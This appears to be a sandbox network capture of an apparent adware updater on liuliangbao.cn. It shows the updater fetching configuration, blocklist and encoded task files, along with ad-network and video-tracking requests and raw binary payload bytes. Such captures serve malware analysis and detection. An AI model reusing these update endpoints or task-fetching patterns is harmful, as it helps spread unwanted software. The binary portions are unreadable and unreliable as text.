Bt~kr0Il#!"0Il$2?2%5'"P/5=5=w;2&T
/5-=`F!"<-"W#" ?2$:-=05>.8P<
6,+[6./o#T63;?2!82/)P&<4-]'#-=`F!"
6$ K>~7?27"??22(h?2)2-=`R<,}5#63`12"0Il1?22"67+[66'/@.$-=`W
+>7!K>~;$/Q<,}5!Z.2230Il1#1"L<,}&-K%3
E~%?2*"6'0Il3<7+G1420Il82?2!?=''R<,}
0Il*-=`A#2&/*P0./o=K>~)#0Il"6-+T15 :P<%
2C}|0Il!2?213!$+[./oW<,}}sK>~	#0I
l2?2!823
Z&550Iln-=`g<,}11=%20:P<6,+[6./oW<,}/K>~: 0Il!.9F'%
22}(=s+"6'!M<,}5!p.5>$ A<,}6'[&?%2<<< skipped >>>

GET /as/down/clt/config/blhash_6.5.dat.zip?t=1484423401&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6 HTTP/1.1

Cache-Control: no-cache

User-Agent: RemoteUpdater : 6.5.73.5

Host: ap.liuliangbao.cn

Connection: Close


HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Jan 2017 09:55:10 GMT

Content-Type: application/zip

Content-Length: 0

Connection: close

Location: hXXp://cltres.liuliangbao.cn/clt/config/blhash_6.5.dat.zip

GET /clt/config/6.5.xml?checksum=&cid=92717DB0E74242C08559DD2797903A6B&rd=23501 HTTP/1.1

Accept-Encoding: gzip, deflate

User-Agent: llb/1.1.73.813

Connection: Keep-Alive

Cache-Control: no-cache

Host: cltres3.liuliangbao.cn


HTTP/1.1 200 OK

Server: Tengine

Content-Type: text/xml

Content-Length: 1097

Connection: keep-alive

Date: Fri, 20 Jan 2017 08:48:30 GMT

Last-Modified: Sat, 14 Jan 2017 19:50:01 GMT

ETag: "587a80e9-449"

Accept-Ranges: bytes

Via: cache8.l2et15[0,304-0,H], cache15.l2et15[1,0], kunlun7.cn405[0,200-0,H], kunlun6.cn405[0,0]

Age: 3977

X-Cache: HIT TCP_MEM_HIT dirn:10:832961061

X-Swift-SaveTime: Fri, 20 Jan 2017 09:16:02 GMT

X-Swift-CacheTime: 3600

Timing-Allow-Origin: *

EagleId: 74cf750614849060874885929e
<?xml version="1.0" encoding="UTF-8"?>..<files>...<file
 name="SearchEngine.ini" md5="a9045b28803c4b4a412ee972d7c62fdd" url="h
ttp://cltres.liuliangbao.cn/clt/config/SearchEngine_6.5.ini?t=14809156
91" />...<file name="GlobalConfig.ini" md5="07b964e0fb090c88d191
61a49a026d27" url="hXXp://cltres.liuliangbao.cn/clt/config/GlobalConfi
g_6.5.ini?t=1480915691" />...<file name="HLR_cfg.ini" md5="4a580
c2fcfdf6fdc144c9d7dd92f5e4a" url="hXXp://cltres.liuliangbao.cn/clt/con
fig/cfg_6.5.ini?t=1480915691" />...<file name="blhash.dat" baseF
older="$DocumentRoot" md5="dd2223f7843fa688b2fa85ca6abbe764" url="http
://ap.liuliangbao.cn/as/down/clt/config/blhash_6.5.dat?t=1484423401" z
ipUrl="hXXp://ap.liuliangbao.cn/as/down/clt/config/blhash_6.5.dat.zip?
t=1484423401" />...<file name="bl.dat" baseFolder="$DocumentRoot
" md5="4a6482d5c6a6f033e8a19c9286978c06" url="hXXp://cltres.liuliangba
o.cn/clt/config/bl_6.5.dat?t=1484423401" />...<file name="runtas
k.dat" baseFolder="$DocumentRoot" md5="58150b04e4d1f65e5cc86e44a40b03d
e" url="hXXp://cltres.liuliangbao.cn/clt/config/runtask_6.5.dat?t=1480
915691" />..</files>....<<< skipped >>>

GET /clt/config/blhash_6.5.dat.zip HTTP/1.1

Cache-Control: no-cache

User-Agent: RemoteUpdater : 6.5.73.5

Host: cltres.liuliangbao.cn

Connection: Close


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:10 GMT

Content-Type: application/zip

Content-Length: 112933

Last-Modified: Sat, 14 Jan 2017 19:50:01 GMT

Connection: close

ETag: "587a80e9-1b925"

Accept-Ranges: bytes
............Mom.u ..Xd..(c....p."}......y..LR...R..:.@............iZ..
.....p&.!tzhh.1m...H.(...(....R..V.snw.wy...j.Z.V...]...............g.
.o6.......4@.H.A.....]{.?.J....`.,9.............KS.m..dX...5O.....7ZFE
.....R..D8]..t..../..-S.m"hw..e..........:.B..w...5.E..|!).W..B}.b`...
..."  j..Zh9r.!..O[........M.,.....P@........T...h..._......:...!c.4..
%.1U/]8...Ci..x T&X.....[{g'X3......N{.ql...TT.....O{......w,b...y....
... 3^....!...{.. ,..{..b..X.r$.< ..o'..*M>.\..<..x.xvR..=...
W....^..b.....^/......'8.9.Q.O...M.$g...I[.......r...p..w.A,. *x.S.0].
'/..e..........O_..........M._...\o....^|..._.,.Y......sy.....Op. ,...
....mz"J?....-,...o....vX^...u.y....?.}:.r9.Mn^k.t..lNn;n..........z..
.....x:.......?.....uiw.\w.A...a.l..]..u.....^s^:....(....-q...L2.6K..
OG....I.|.......q9...A<.$|......;-}.....k.7.>.?L....O......9.CR.
.....a.>....y..c...!.....v.h,...&v.`.t.y.V... ..K.....9.....z......
....s.......M. 8F.n.......t.u&.m..Q..W.~....Ou..w...?}......._n>.&g
t;~..!......w>...6.w.....~..........99...z.O....^.......\>]..=h.
.....>.._>..>p.C.w....}{..t....v%....O..P......x...e...o}...O
............n:....<..:OJW>.W.....:s.|#l./K{...m....Bi..../...../
......=........Nn6.'..K..X.~...:./..Kl..Ow7}._...~;..\./*.....2.9...6.
.......:..-......w._.n...<u.V..............................".~....)
.>GZ'.......e.c{...~.p.I........K.>.....{.....s.....G..P.\....x.
...xO.:.x.I.\.....@.I....=..ae..6.%v ..s.}..4..\t...s.PIw.<...M..n/
Qk]....!.qN...s..vF...J..9.Q....k...7]r..B.u.Oy.u....N...9....u9. <<< skipped >>>

GET /dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_he4eNkbQAXSVjSzyFW81pDZ1LQvRk0CVy9J18PeJAbVVt-IMC1Zl8l1WjWIKsObHQmfGpfbZyKbox8daLfvnzv-6kCE7nnFtZ3paiDX_-ZsB8MuOjgvFxwEQr8ayg0miQDuoxxxoh7E4Gd6pZxmF9AGchxt3FyQ8IGgTXhFf4aSOO2YdX2qGA5tfgMvXwz7YD21LeOReOWn5in9ya3T5q9mXTvU4J_aADuR2ne1UtxV3ZpKoaYgF0LScgRk1v50wpzWtQUBhjCXsPr2gs89m6NGFVIVT1MXAW1ITtUq2JnutP1epFGIuAh8bpninXTA140cE_nlxrycHwdZYnlyJfnsELu7IoeclyYRYdr2Z8s7RKZmdOeYrJ7saFdudE3V1Rj&v=404&seq=5 HTTP/1.1

Accept: */*

Referer: hXXp://x.jd.com/exsites?spread_type=2&ad_ids=198:5&location_info=0&callback=getjjsku_callback

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: im-x.jd.com

Connection: Keep-Alive

Cookie: __jda=.238043269.1484906111.1484906111.1484906111.0


HTTP/1.1 200 OK

Server: openresty

Date: Fri, 20 Jan 2017 09:55:14 GMT

Content-Type: image/gif

Transfer-Encoding: chunked

Connection: close

Expires: Fri, 20 Jan 2017 09:55:13 GMT

Cache-Control: no-cache

0..

GET /cpro/ui/html/sync.htm?sid=&p=iqiyi&t=1484906112271 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: cpro.baidu.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Accept-Ranges: bytes

Cache-Control: max-age=0

Connection: keep-alive

Content-Length: 0

Content-Type: text/html

Date: Fri, 20 Jan 2017 09:55:14 GMT

Etag: "5881b753-0"

Expires: Fri, 20 Jan 2017 09:55:14 GMT

Last-Modified: Fri, 20 Jan 2017 07:08:03 GMT

Server: nginx

HTTP/1.1 200 OK..Accept-Ranges: bytes..Cache-Control: max-age=0..Conne
ction: keep-alive..Content-Length: 0..Content-Type: text/html..Date: F
ri, 20 Jan 2017 09:55:14 GMT..Etag: "5881b753-0"..Expires: Fri, 20 Jan
 2017 09:55:14 GMT..Last-Modified: Fri, 20 Jan 2017 07:08:03 GMT..Serv
er: nginx..

GET /ads?zone_id=1344031&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads.trafficjunky.net

Connection: Keep-Alive

Cookie: tj_UUID=b3da0bc7-5356-4cf4-8cd7-941025e2cf15


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:06 GMT

Content-Type: text/html

Content-Length: 1691

Connection: close

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Server: Logger/0.1

Set-Cookie: tj_UUID=b3da0bc7-5356-4cf4-8cd7-941025e2cf15; domain=.trafficjunky.net; path=/; Expires=Mon Jan 15 04:55:06 2018

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400
<HTML><HEAD><script type="text/javascript"> var MAXI
MUM_DEPTH = 10;function mouseover(self){for(var i = 0; i < MAXIMUM_
DEPTH; i  ){var parent = getParent(window.parent, i);parent.postMessag
e({event: "mouseover", click_url:self.attributes.click_url.value}, "*"
);}}function mouseout(self){for(var i = 0; i < MAXIMUM_DEPTH; i  ){
var parent = getParent(window.parent, i);parent.postMessage({event:"mo
useout"}, "*");}}function getParent(e, i){if( i == 0){return e;}return
 getParent(e.parent, i - 1);}</script><TITLE>Ad delivery s
ystem</TITLE><meta name="keywords" content="1000232241" def="
1" z_id="1344031" ad_id="1189078351" qw="0" isave="yes" /> <meta
 name="description" content="" /> <style type="text/css"><
!-- a img   { border: 0; } body    { margin: 0; padding: 0; text-align
: center;} --> </style> </HEAD><BODY style="backgrou
nd-color:transparent;"><iframe onmouseover="mouseover(this);" on
mouseout="mouseout(this)" id="1344031_1484906106" name="1344031_148490
6106" src="hXXp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651
284&impid=56_1484906106582962_12796&uuid=b3da0bc7-5356-4cf4-8cd7-94102
5e2cf15" width="300" height="250" scrolling="no" frameborder="0" allow
transparency="true" marginwidth="0" marginheight="0" z_id="1344031" c_
id="1000232241"  ad_id="1189078351" def="1" qw="0" click_url="hXXp://a
ds.trafficjunky.net/click?url=iframe-click&click_data=QAAAAOQlAAB6
3oFYAAAAAAAAAAAfghQAH4IUAAAAAAAxVZ47T-XfRs1OijwAAAAAAAAAAAABAAAAAA<<< skipped >>>

GET /dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_hebtboSJ6LnIVrJSLFTFAor6VibSw4roh9pVbMZp9UcE8uIoVcWJijeAaMqIiza0gk14gOAuJt5BfBvNg_B0OM4DdUu5kuIzf2jvfzxWGhvqSoIXIN5Zsxd5XfxO6X9nF8C6KTWUFOCcu2k-Y_sjHFjrhTRV5VyRzvC3wmInmnXYGXJTZIdnAjyfzOhwuYrGE8d_t79q2bd1hawuJc__CcDSM4Vqm-MSDgNPASm8mE09PgVXumdj8hkrzimh_Rd2RRvNxxus369cMbtIMMIcIvTvF_Ru1wbI9R7YfGziPepiLZu9Sl1LX_rGaA3-bqb_BcQFWaNWM1rqad5eXbrCMtxvTHnL6i2KVYpZpKCKZbOUMhYuHYOuvjDcPqd0w1NRwx&v=404&seq=8 HTTP/1.1

Accept: */*

Referer: hXXp://x.jd.com/exsites?spread_type=2&ad_ids=198:5&location_info=0&callback=getjjsku_callback

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: im-x.jd.com

Connection: Keep-Alive

Cookie: __jda=.238043269.1484906111.1484906111.1484906111.0


HTTP/1.1 200 OK

Server: openresty

Date: Fri, 20 Jan 2017 09:55:14 GMT

Content-Type: image/gif

Transfer-Encoding: chunked

Connection: close

Expires: Fri, 20 Jan 2017 09:55:13 GMT

Cache-Control: no-cache

0..

GET /ads?zone_id=1331611&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads.trafficjunky.net

Connection: Keep-Alive

Cookie: tj_UUID=b3da0bc7-5356-4cf4-8cd7-941025e2cf15


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:06 GMT

Content-Type: text/html

Content-Length: 1691

Connection: close

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Server: Logger/0.1

Set-Cookie: tj_UUID=b3da0bc7-5356-4cf4-8cd7-941025e2cf15; domain=.trafficjunky.net; path=/; Expires=Mon Jan 15 04:55:06 2018

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400
<HTML><HEAD><script type="text/javascript"> var MAXI
MUM_DEPTH = 10;function mouseover(self){for(var i = 0; i < MAXIMUM_
DEPTH; i  ){var parent = getParent(window.parent, i);parent.postMessag
e({event: "mouseover", click_url:self.attributes.click_url.value}, "*"
);}}function mouseout(self){for(var i = 0; i < MAXIMUM_DEPTH; i  ){
var parent = getParent(window.parent, i);parent.postMessage({event:"mo
useout"}, "*");}}function getParent(e, i){if( i == 0){return e;}return
 getParent(e.parent, i - 1);}</script><TITLE>Ad delivery s
ystem</TITLE><meta name="keywords" content="1000232241" def="
1" z_id="1331611" ad_id="1189078351" qw="0" isave="yes" /> <meta
 name="description" content="" /> <style type="text/css"><
!-- a img   { border: 0; } body    { margin: 0; padding: 0; text-align
: center;} --> </style> </HEAD><BODY style="backgrou
nd-color:transparent;"><iframe onmouseover="mouseover(this);" on
mouseout="mouseout(this)" id="1331611_1484906106" name="1331611_148490
6106" src="hXXp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651
284&impid=28_1484906106403577_17845&uuid=b3da0bc7-5356-4cf4-8cd7-94102
5e2cf15" width="300" height="250" scrolling="no" frameborder="0" allow
transparency="true" marginwidth="0" marginheight="0" z_id="1331611" c_
id="1000232241"  ad_id="1189078351" def="1" qw="0" click_url="hXXp://a
ds.trafficjunky.net/click?url=iframe-click&click_data=QAAAAOQlAAB6
3oFYAAAAAAAAAACbURQAm1EUAAAAAAAxVZ47T-XfRs1OijwAAAAAAAAAAAABAAAAAA<<< skipped >>>

GET /tmpstats.gif?type=yhls20130924&usract=sunkuotest&tn=1484906108169&yhls=1573105147225&fuid=&juid=&ua=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201&ver=&url=http://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&_=1484906108170 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:08 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive

HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 20 Jan 2017 09:55:08 
GMT..Content-Type: image/gif..Content-Length: 0..Connection: keep-aliv
e......

GET /tmpstats.gif?type=piaoshhtestmayttf&des=find_Q_ready&url=http://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&_=1238272289 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:09 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive

HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 20 Jan 2017 09:55:09 
GMT..Content-Type: image/gif..Content-Length: 0..Connection: keep-aliv
e......

GET /tmpstats.gif?type=yhls20130924&usract=jingyitest1&url=http://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&ver=WIN 23,0,0,185&yhls=1485764902188&pla=11&mod=cn_s&tn=0.6147289201617241 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:11 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive
HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 20 Jan 2017 09:55:11 
GMT..Content-Type: image/gif..Content-Length: 0..Connection: keep-aliv
e......


GET /cp2.gif?s=1484906112427&t=s&av=3.12.0&e=98f3f08439c68c9b57b3520f0696fb2c&vv=5.3.2.47&rd=1509&y=qc_100001_100226&p=pl&rc=1 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:12 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive
HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 20 Jan 2017 09:55:12 
GMT..Content-Type: image/gif..Content-Length: 0..Connection: keep-aliv
e......


GET /vpb.gif?flag=plyract&plyract=load&prgr=0&aid=204432001&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=10&lev=2&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=2&ispur=0&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.22120652068406343 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:14 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive
HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 20 Jan 2017 09:55:14 
GMT..Content-Type: image/gif..Content-Length: 0..Connection: keep-aliv
e......


GET /core?t=15&ptid=11&pf=1&p=10&p1=101&c1=10&r=572044000&aid=204432001&u=5088e17771f6d54476f95dc61f9e80b4&pu=&v=3.3.12.9&ra=2&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&ce=11d91127a84babbf6dabdf9e702b5f03&ve=0418909173dcc97c13d68d5c2ee32172&vfrm=&vfrmtp=manclick&sdktp=1&hu=&ht=0&mod=cn_s&islocal=0&rfr=&lrfr=DIRECT&rn=0.6126211592927575 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:14 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive
....


GET /tmpstats.gif?type=yhls20130924&usract=140707adinit&pla=11&mod=cn_s&tn=0.23817403800785542 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:14 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive
....


GET /cp2.gif?ps=0&h=0&p=i&s=1484906114377&a=9b9366963d49845dcaef1cf22d487ad8&t=s&b=204432001&c=10&v=572044000&av=AdManager 3.63.0&e=98f3f08439c68c9b57b3520f0696fb2c&rid=60d34018ac24eb58180b7eb57af7bbf5&vv=5.3.2.47&l=MTk0LjI0Mi45Ni4yMTg=&y=qc_100001_100226&d=57&g=0 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:15 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive
....


GET /vpb.gif?flag=stuenv&plyrver=3.3.12.9&pla=11&os=Windows 7&browser=MSIE&dpi=1276X846&flashver=WIN 23,0,0,185&newusr=1&vid=787ab6983c8a883fa3c5190ce3cac804&aid=204432001&tvid=572044000&cid=10&purl=http://VVV.iqiyi.com/v_19rra3jt70.html&lev=2&puid=&pru=&suid=5088e17771f6d54476f95dc61f9e80b4&visits=&pla=11&weid=11d91127a84babbf6dabdf9e702b5f03&veid=0418909173dcc97c13d68d5c2ee32172&coop=&ctgid=0&plid=572044000&vvfrom=lianbo&mod=cn_s&tn=0.4808125551789999 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:15 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive
HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 20 Jan 2017 09:55:15 
GMT..Content-Type: image/gif..Content-Length: 0..Connection: keep-aliv
e......


GET /cp2.gif?ps=0&rd=1170&h=0&p=s&rc=1&s=1484906115563&a=9b9366963d49845dcaef1cf22d487ad8&t=s&b=204432001&c=10&av=AdManager 3.63.0&e=98f3f08439c68c9b57b3520f0696fb2c&rid=8f6f04431c47096fdb4b10b9161f986a&vv=5.3.2.47&l=MTk0LjI0Mi45Ni4yMTg=&y=qc_100001_100226&d=57&g=0 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:15 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive
HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 20 Jan 2017 09:55:15 
GMT..Content-Type: image/gif..Content-Length: 0..Connection: keep-aliv
e......


GET /b?t=21&u=5088e17771f6d54476f95dc61f9e80b4&pu=null&pf=1&bstp=24_dmfc&p2=1011&qpid=572044000&aid=0&block=1409011_dm&p=10&p1=101&_=2134069781 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:16 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 20 Jan 2017 09:55:16 
GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-aliv
e..

GET /clt/config/runtask_6.5.dat?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6 HTTP/1.1

Cache-Control: no-cache

User-Agent: RemoteUpdater : 6.5.73.5

Host: cltres.liuliangbao.cn

Connection: Close


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:14 GMT

Content-Type: application/octet-stream

Content-Length: 22812

Last-Modified: Mon, 05 Dec 2016 05:28:11 GMT

Connection: close

ETag: "5844faeb-591c"

Accept-Ranges: bytes

..[.b.l.].....a.l.l.m.a.t.c.h.=.1.I.F.I.9.F.a.3.6.9.7.8.5.7.7.b.6.7.0.
2.6.7.4.a.3.4.4.5.2.7.1.0.5.a.8.d.1.a.d.4.1.d.8.c.d.9.8.f.0.0.b.2.0.4.
e.9.8.0.0.9.9.8.e.c.f.8.4.2.7.e.e.0.e.9.8.5.e.6.b.f.4.0.0.4.f.d.5.6.4.
9.0.4.b.c.3.3.f.9.b.e.e.b.a.a.7.8.9.c.0.2.b.c.3.8.7.2.....d.l.l.f.=.1.
I.F.I.9.F.d.9.2.7.b.0.a.3.6.d.f.2.8.a.c.f.0.1.3.d.7.e.e.c.c.6.6.0.9.1.
5.a.d.4.1.d.8.c.d.9.8.f.0.0.b.2.0.4.e.9.8.0.0.9.9.8.e.c.f.8.4.2.7.e.d.
e.e.d.c.2.7.7.c.1.b.4.e.c.a.a.c.a.....d.o.m.a.i.n.=.1.I.F.I.9.F.b.a.1.
4.1.b.e.e.1.f.0.2.c.7.b.a.0.a.7.3.e.7.9.1.a.8.d.1.b.e.a.5.d.4.1.d.8.c.
d.9.8.f.0.0.b.2.0.4.e.9.8.0.0.9.9.8.e.c.f.8.4.2.7.e.5.0.6.9.7.7.4.2.7.
2.4.b.7.7.6.9.e.1.d.7.6.8.8.2.0.4.c.0.8.d.a.0.d.0.4.a.9.3.2.1.2.c.d.0.
7.6.6.c.5.3.6.7.4.1.9.4.b.c.f.3.d.7.f.f.3.6.a.e.6.b.b.b.2.a.3.b.f.6.7.
2.3.b.f.f.e.7.4.7.3.d.1.b.0.a.f.2.d.4.3.6.5.5.e.9.0.3.e.f.8.5.9.a.9.2.
1.3.f.f.a.2.3.c.5.2.2.9.9.5.6.3.2.7.9.b.3.8.e.6.0.7.e.5.d.d.d.4.6.9.a.
d.8.8.b.0.7.5.2.b.0.d.8.7.0.4.0.7.3.a.6.2.0.5.4.1.c.f.e.c.1.5.8.2.a.a.
f.6.5.9.7.9.b.3.7.4.6.7.3.b.b.7.3.9.3.f.3.b.d.4.b.e.2.3.4.f.c.2.0.b.e.
7.f.c.0.7.e.3.e.2.3.e.2.7.2.a.0.f.9.2.0.b.2.c.d.a.b.9.b.e.2.6.5.4.6.4.
a.9.a.0.e.b.0.5.4.8.9.d.f.1.b.9.d.b.d.4.7.5.a.5.f.8.4.7.f.5.c.d.9.4.3.
1.5.c.a.f.3.a.9.5.c.1.1.1.5.c.d.6.4.d.6.b.9.9.7.6.f.5.b.1.5.c.9.e.c.f.
4.1.2.2.8.9.0.4.b.8.d.a.4.b.b.a.2.9.a.c.6.a.5.8.0.f.....f.b.=.1.I.F.I.
9.F.c.0.c.b.5.f.0.f.c.f.2.3.9.a.b.3.d.9.c.1.f.c.d.3.1.f.f.f.1.e.f.c.d.
4.1.d.8.c.d.9.8.f.0.0.b.2.0.4.e.9.8.0.0.9.9.8.e.c.f.8.4.2.7.e.6.8.....
